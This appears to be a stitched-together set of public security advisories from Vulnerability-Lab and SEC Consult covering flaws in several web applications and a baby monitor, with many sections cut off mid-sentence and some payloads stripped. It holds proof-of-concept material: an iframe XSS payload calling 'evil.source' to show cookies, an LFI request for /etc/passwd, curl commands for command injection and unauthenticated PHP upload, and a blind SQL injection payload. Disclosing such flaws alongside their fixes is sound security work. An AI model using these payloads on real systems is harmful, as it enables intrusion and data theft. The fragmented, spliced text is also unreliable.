   Host[cpshop.localhost:8080]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   Accept-Language[de,en-US;q=0.7,en;q=0.3]
   Accept-Encoding[gzip, deflate]
   Referer[http://cpshop.localhost:8080/cpshop/admin.php]
   Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
Response Header:
   Server[Apache/2.4.27]
   X-Powered-By[PHP/7.0.20]
   Expires[Thu, 19 Nov 1981 08:52:00 GMT]
   Cache-Control[no-store, no-cache, must-revalidate]
   Pragma[no-cache]
   X-Frame-Options[SAMEORIGIN]
   Content-Encoding[gzip]
   Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/]
   Upgrade[h2c]
   Connection[Upgrade, Keep-Alive]
   Keep-Alive[timeout=5, max=100]
   Transfer-Encoding[chunked]
   Content-Type[text/html; charset=utf-8]

Reference(s):
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
http://cpshop.localhost:8080/cpshop/admin.php#!file=help=search=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files=rename_dir[dir]=fancybox[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files=rename_dir[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files=rename_dir[dir]=

Solution - Fix & Patch:
===
The cross-site scripting vulnerabilities can be resolved by encoding the affected values on output (for example with htmlentities) and by restricting the characters accepted as input.

Security Risk:
==
The security risk of the client-side cross-site scripting vulnerabilities in the web application is estimated as medium (CVSS 3.4).
Credits & Authors:
======
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty.
Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities
g-img-src-x-img-]
   title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520% 22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
   pathProjectGlobal[%2Fdefault-wGlobal]
   pathProjectLayout[]
   language[br]
   projectConnect[%2Fimg-src-x-img-img-src-x-img-]
   hostOnly[]
   pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
   permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
   W_PRETMP_groups%5B%5D[%5BW_ID%5D]
   backupGroup[]
Response Header:
   Server[Apache/2.4.27]
   X-Powered-By[PHP/7.0.20]
   Expires[Thu, 19 Nov 1981 08:52:00 GMT]
   Cache-Control[no-store, no-cache, must-revalidate]
   Vary[Accept-Encoding]
   Keep-Alive[timeout=5, max=100]
   Connection[Keep-Alive]
   Transfer-Encoding[chunked]
   Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject=/img-src-x-img-img-src-x-img-
Mime Type[text/html]
Request Header:
   Host[grid.localhost:8080]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit=/default-wGlobal/ wGlobal/content/variables/default.wVariables.php=be=/de/index.php=default==0]
   Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
Response Header:
   Server[Apache/2.4.27]
   X-Powered-By[PHP/7.0.20]
   Expires[Thu, 19 Nov 1981 08:52:00 GMT]
   Cache-Control[no-store, no-cache, must-revalidate]
   Pragma[no-cache]
   Content-Encoding[gzip]
   Vary[Accept-Encoding]
   Keep-Alive[timeout=5, max=97]
   Connection[Keep-Alive]
   Transfer-Encoding[chunked]
   Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents=/img-src-x-img-img-src-x-img-=project=embed
Mime Type[text/html]
Request Header:
   Host[grid.localhost:8080]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject=/img-src-x-img-img-src-x-img-]
   Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
Response Header:
   Server[Apache/2.4.27]
   X-Powered-By[PHP/7.0.20]
   Expires[Thu, 19 Nov 1981 08:52:00 GMT]
   Cache-Control[no-store, no-cache, must-revalidate]
   Pragma[no-cache]
   Keep-Alive[timeout=5, max=96]
   Connection[Keep-Alive]
   Transfer-Encoding[chunked]
   Content-Type[text/html; charset=UTF-8]

Reference(s):
https://grid.localhost:8080/
https://grid.localhost:8080/weblication/
https://grid.localhost:8080/weblication/grid5/
https://grid.localhost:8080/weblication/grid5/scripts/
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php

Solution - Fix & Patch:
===
The vulnerability can be resolved by sanitizing the input delivered through the wFilemanager.php file and by encoding it at the output location where it is rendered in the content projects ("Inhaltsprojekte").

Security Risk:
==
The security risk of the persistent cross-site scripting vulnerability in the web application is estimated as medium (CVSS 3.5).

Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty.
AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability
FCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
POST data:
   pmrecipients[admin]
   pmsubject[test]
   pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A]
   postcode[yerudyyk4joz8ea5]
   pmsaveinsentitems[on]
   sendpm[Send+PM]
Response Header:
   Server[Apache]
   X-Powered-By[PHP/5.4.45]
   Content-Length[217]
   Content-Type[text/html; charset=ISO-8859-1]
-
Status: 200[OK]
GET https://aeforums.localhost:8000/AEF/evil.source
Mime Type[text/html]
Request Header:
   Host[aeforums.localhost:8000]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   Referer[https://aeforums.localhost:8000/AEF/index.php?act=usercp=sendsaved=1]
   Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
Response Header:
   Server[Apache]
   Accept-Ranges[bytes]
   Content-Length[431]
   Content-Type[text/html; charset=UTF-8]

Reference(s):
https://aeforums.localhost:8000/AEF/
https://aeforums.localhost:8000/AEF/index.php

Solution - Fix & Patch:
===
The vulnerability can be patched by sanitizing the input of the ftp link element in the private message module and by encoding the link at the output location in the editor, so that the stored value can no longer be executed.

Security Risk:
==
The security risk of the persistent cross-site scripting vulnerability in the open-source web application is estimated as medium (CVSS 4.4).

Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
vulnerable version: 1.1.9
fixed version: 2.2.0
CVE number: (requested but not yet received)
impact: Critical
homepage: https://pluginus.net/
found: 2018-02-20
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike most of the big companies on the net, we believe in individual approach to every our customer. Web development is our passion and we always try to go an extra mile over our clients' expectations. Our team specializes in development of WordPress plugins. It's always exciting to try new technologies and approaches to get the project done and impress clients by realization of their ideas!"
Source: https://pluginus.net/about-us/

Business recommendation:
SEC Consult recommends to upgrade to the latest version available as soon as possible. Further detailed security tests should be performed in order to identify potential other security issues.

Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implements a page redraw AJAX function that is accessible to anyone without any authentication. WordPress shortcode markup passed in the "shortcode" parameter is evaluated. Normally, unauthenticated users cannot evaluate shortcodes, as shortcodes are often sensitive. Additionally, other shortcodes implemented and used by this plugin can be abused through the same attack. Worse, some of them could lead to remote code execution.

2. Local File Inclusion
The vulnerability is due to the lack of args/input validation in render_html before the args are passed to extract(), a PHP built-in function. Because of this, the supplied args/input can be used to overwrite the $pagepath variable, which then could lead to a local file inclusion attack.

Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by the code execution vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]
action=woof_redraw_woof=<>

2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by the local file inclusion vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]
action=woof_redraw_woof=woof_search_options pagepath=/etc/passwd

Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and found to be vulnerable.

Vendor contact timeline:
2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory

Solution:
-
The vendor provides an updated version and users are urged to upgrade to version 2.2.0 immediately:
https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/ind
SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
vulnerable version: 9.1.501
fixed version: 9.2.501 or hotfix patch "1_012018"
CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704, CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
impact: Critical
homepage: https://www.securenvoy.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience. Businesses rely on email with an increasing amount of sensitive data sent across their networks. A revolutionary approach that doesn't suffer from the overheads of deployment and encryption management; just rock-solid security to give you 100% confidence in your business communications."
URL: https://www.securenvoy.com/products/securmail/key-features.shtm

Business recommendation:
During a brief crash test of the SecurEnvoy SecurMail application several severe vulnerabilities have been identified that break the core security promises of the product. These vulnerabilities open the possibility for several different attack scenarios that allow an attacker to read other users' encrypted e-mails and overwrite or delete e-mails stored in other users' inboxes. As we have identified several critical vulnerabilities within a very short time frame we expect numerous other vulnerabilities to be present. As other SecurEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.

Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating HTML pages. Therefore persistent and reflected cross site scripting attacks are possible throughout the application. Some pages fail to properly decode URL encoded parameters. Because of this, cross site scripting cannot be exploited on these pages in most browsers.

2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application. Since the application uses encrypted files as the primary method of data storage, this vulnerability can be exploited at several points. Using this vulnerability, a legitimate recipient can read mails sent to other recipients in plain text!

3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate recipient to read mails sent to other users in plain text.

4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the SecurEnvoy server. Therefore anyone with network access to the server can arbitrarily send e-mails that appear to come from an arbitrary sender address. Moreover, an attacker with network access to the server can re-send previous communication to arbitrary recipients. This allows him/her to extract all e-mails stored on the server. An attacker could also modify arbitrary messages stored on the server.

5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An attacker could use this vulnerability to delete a victim's e-mail or to impersonate the victim and reply to his/her e-mails.

Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As several core security promises had already been broken during this short crash test, no further tests were conducted.

Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragments demonstrate reflected cross site scripting (CVE-2018-7703):
--- snip ---
--- snip ---

b) E-mails that are sent using the HTML format can contain any
SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
vulnerable version: <1.9.17
fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch
CVE number: -
impact: Medium
homepage: http://testlink.org/
found: 2017-09-22
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow - Munich - Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically."
Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code

Business recommendation:
SEC Consult advises to immediately install the available updates as attackers might gain access to sensitive data belonging to other users. A thorough security review performed by security professionals is highly recommended in order to identify potential further security deficiencies.

Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced by different test cases. By simply iterating over the ID, all produced output data can be gathered from the whole system. The actual impact strongly depends on the classification of the referenced data. Therefore, the risk can vary from low to critical depending on the use case.

Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment by using the following URL:

http:///lib/attachments/attachmentdownload.php?skipCheck=1=

The tag specifies the target address and can also include a sub-folder where the hosted TestLink application is located.

Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14

Vendor contact timeline:
2017-10-18: Contacting vendor through http://mantis.testlink.org. Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for 1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test instance) and that it can be verified easily with the PoC.
2018-01-09: Asked for status update; no answer.
2018-01-29: Asked for status update; no answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the advisory.
2018-02-19: Asked the vendor for a reachable test instance; reply: there is no test instance.
2018-02-28: Public release of security advisory

Solution:
-
Check out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/
The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d
Upgrade to 1.9.17 (after November 2017).

Workaround:
---
Restrict network access and do not expose the TestLink interface to the internet.

Advisory URL:
-----
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow - Munich - Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Henc
SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
    Wan Ikram (Office Kuala Lumpur)
    Fikri Fadzil (Office Kuala Lumpur)
    Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow - Munich - Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu in few minutes of setup. It was first created in 2007 by Arslan Hassan and his team of developers. ClipBucket was developed as a YouTube clone but has been upgraded with advanced features and enhancements. It uses FFMPEG for video conversion and thumbs generation which is the most widely used application so, users can stream it straight away using the Video JS and HTML 5 Players."
Source: https://clipbucket.com/about

Business recommendation:
By exploiting the vulnerabilities documented in this advisory, an attacker can fully compromise the web server on which ClipBucket is installed. Potentially sensitive data might get exposed through this attack. Users are advised to immediately install the patched version provided by the vendor.

Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Arbitrary OS commands can be injected by an unauthenticated attacker. This is a serious vulnerability, as the chances of the system being fully compromised are very high. This same vulnerability can also be exploited by authenticated attackers with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded to the webserver by an unauthenticated attacker. It is possible for an attacker to upload a script that issues operating system commands. This same vulnerability can also be exploited by an authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute arbitrary SQL commands on the underlying MySQL server.

Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability by manipulating the "file_name" parameter during the file upload in the script /api/file_uploader.php:

$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" http://$HOST/api/file_uploader.php

Alternatively, this vulnerability can also be exploited by authenticated users with basic privileges via the same issue in /actions/file_downloader.php, using the following payload:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc || <>" "http://$HOST/actions/file_downloader.php"

2. Unauthenticated Arbitrary File Upload
Below are the cURL requests to upload arbitrary files to the webserver with no authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/beats_uploader.php"
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with basic privileges:

$ curl --cookie "[--SNIP--]" -F "coverPhoto=@valid-image-with-appended-phpcode.php" "http://$HOST/edit_account.php?mode=avatar_bg"

3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable to unauthenticated blind SQL injection.

URL     : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())

The source code excerpt below shows the vulnerable code:

VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
    $query = "UPDATE " . tbl("users") . " SET
SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors
We have published an accompanying blog post to this technical advisory with further information:
https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html

SEC Consult Vulnerability Lab Security Advisory < 20180221-0 >
===
title: Hijacking of arbitrary video baby monitors
product: miSafes Mi-Cam remote video monitor
vulnerable version: Android application v1.2.0, iOS v1.0.5, Firmware v1.0.38
fixed version: -
CVE number: -
impact: critical
homepage: http://www.misafes.com/mi-cam
found: 2017-11-30
by: Mathias Frank (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow - Munich - Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy set up & use, two-way talk and supports free local video recording, all can be use by our user friendly Mi-Cam app."
Source: http://www.misafes.com/mi-cam

Business recommendation:
SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved! Although cloud-connected hardware may have an advantage regarding usability and convenience for users, if security is lacking those products pose a great risk for all customers. Furthermore, there seem to be similar products from other vendors, e.g. "Qihoo 360 Smart Home Camera", that look exactly the same and may also be affected, but SEC Consult could not verify this. The cloud component hosted by "qiwocloud2.com" may be used by other products as well. Additional information regarding other vendors is given in our blog post linked at the top of this advisory.

Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application involves numerous requests to a cloud infrastructure available at ipcam.qiwocloud2.com, with the aim of communicating with the video baby monitor or the respective Android application. The Android application has at least 5-10 installations according to Google Play Store, with potentially as many iOS users as well. SEC Consult has identified multiple critical security issues within this product.

1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the video baby monitor involves several different API calls. A number of critical API calls can be accessed by an attacker with arbitrary session tokens because of broken session management. This allows an attacker to retrieve information about the supplied account and its connected video baby monitors. The information retrieved through this feature is sufficient to view and interact with all video baby monitors connected to the supplied UID.

2) Missing Password Change Verification Code Invalidation
The forgotten-password functionality sends a 6-digit validation key, valid for 30 minutes, to the supplied email address in order to set a new password. Multiple codes can be requested, though, while previously delivered codes do not get invalidated, and any one of them can be used as a valid key. This can easily be brute-forced to take over other accounts.

3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface through which an attacker is able to get hardware level access to the device and, for instance, extract the firmware for further analysis. SEC Consult identified further security issues such as outdated software (issue 6) or weak passwords (issue 4) by analyzing the firmware using IoT Inspector (https://www.iot-inspector.com).

4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default credentials with only 4 digits.

5) Enumeration of user accounts
The password reset functionality leaks information about the existence of supplied user accounts, which can aid in further (brute-force) attacks.

6) Outdated and Vulnerable Software
Several software components which are affected by publicly known vulnerabilities were identified in the firmware of the video baby monitor.

Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed, we will omit detailed proof of concept information in this advisory.

1) Broke
SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
vulnerable version: <=2.14.5, <=3.7.1
fixed version: 2.14.6, 3.8.0
CVE number: CVE-2018-5306, CVE-2018-5307
impact: Medium
homepage: https://www.sonatype.com/
found: 2017-12-12
by: Werner Schober, Daniel Ostovary (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow - Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open source software development. From our humble beginning as core contributors to Apache Maven, to supporting the world’s largest repository of open source components (Central), to distributing the world's most popular repository manager (Nexus), we exist for one simple reason; to help accelerate software innovation."
Source: https://www.sonatype.com/about-sonatype

Business recommendation:
The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities which could be used by an attacker to execute JavaScript code in the user's browser. The vendor provides a patch for both version 2 and 3 of the product, which should be installed immediately. It is recommended to conduct a thorough security review by IT security professionals in order to identify potential other security issues.

Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function are vulnerable to reflected XSS. If the attacker can lure a user into clicking a crafted link, he could execute arbitrary JavaScript code. In case the user has sufficient permissions, an attacker can create arbitrary (administrative) users or perform stored XSS attacks (see 2).

2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities, which are described in the following list.

2.1) The first one is located in the "File Upload" functionality of the "Staging Upload". Uploading a file with JavaScript code in its name allows to store JavaScript code, which gets triggered every time the file name is shown (e.g. in "Repositories").

2.2) The second stored XSS vulnerability is more precisely considered a stored DOM injection. This vulnerability affects the functionality of creating a new user. When doing so it is possible to inject JavaScript/HTML code in the username, which later gets rendered/executed every time the username is displayed.

2.3) The third stored XSS vulnerability is also a stored DOM injection. It affects the "IQ Server Connection"/"IQ Server Dashboard" functionality. The "IQ Server URL" field in the "IQ Server Connection" allows to inject JavaScript/HTML code into the menu bulletpoint "IQ Server Dashboard".

The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2

Proof of concept:
-
1) Reflected XSS vulnerability
By luring a user into clicking the following link, an arbitrary JavaScript payload will be executed:

https://example.com/nexus/service/siesta/healthcheck/healthCheckFileDetail/.../index.html?repoId=public=sectest

Vulnerable parameters:
-) repoId
-) format

2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities are susceptible to the following stored XSS vulnerabilities.***

2.1) The staging upload allows an attacker to upload a file which contains a JavaScript payload in the filename. An example of a filename containing a "malicious" payload is as follows:

".jpg"

This file can be uploaded flawlessly, and every time the filename is displayed, the JavaScript payload gets executed.

2.2) An attacker is able to create a new user which contains a malicious JavaScript payload in the username. As an example the following username can be used:

"EvilAdmin

Create Repository -> Access repository via "Repositories" -> JavaScript code is being executed)

2.3) The Nexus server allows to set up an IQ server connection. The server name is not validated and therefore allows the permanent injection of JavaScript code. To demonstrate the vulnerability
SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip
